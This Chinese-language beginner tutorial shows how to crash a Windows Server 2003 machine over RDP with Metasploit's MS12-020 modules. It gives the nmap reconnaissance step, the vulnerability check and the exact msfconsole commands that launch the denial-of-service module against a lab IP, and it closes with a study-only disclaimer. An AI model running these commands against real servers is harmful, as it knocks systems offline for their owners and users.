详解新手如何使用metasploit对win2003进行蓝屏攻击

在攻击之前首先需要几个必须条件：
1、目标机开放3389端口
2、目标机版本为windows2003（IIS6.0）
3、确保目标机与攻击机可以相互ping通

攻击流程：
一、信息收集
使用nmap进行扫描，查看开放的端口。

二、漏洞挖掘
首先运行MSF，查找有关MS12020的aux

msf > search ms12-020

这里有两个aux，第一个是攻击的aux，第二个是检测是否具有MS12020漏洞的aux，我们先使用第二个aux对目标机进行检测

msf > use auxiliary/scanner/rdp/ms12_020_check 

接下来配置参数：

msf > set rhosts

这里的rhosts是目标机的IP地址

配置完以后show options 这里已经配置完毕了

msf > show options

接下来exploit开始检测，这里检测出可以使用MS12020进行攻击。

msf > exploit

三、漏洞利用
接下来我们就可以使用第一个aux模块进行攻击了。

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids //选择攻击摩模块

msf > set rhost 192.168.48.10 //设置目标机IP地址

msf > show options //检查配置参数是否正确

msf > exploit //开始攻击

现在已经攻击成功了，我们来看一下效果如何。

没几秒服务器就挂掉了，攻击成功，这种攻击相对于DDoS来说更直接也更简单。

注：本文仅供参考学习，请勿在网上搞破坏，触犯法律者应承担相应的法律责任！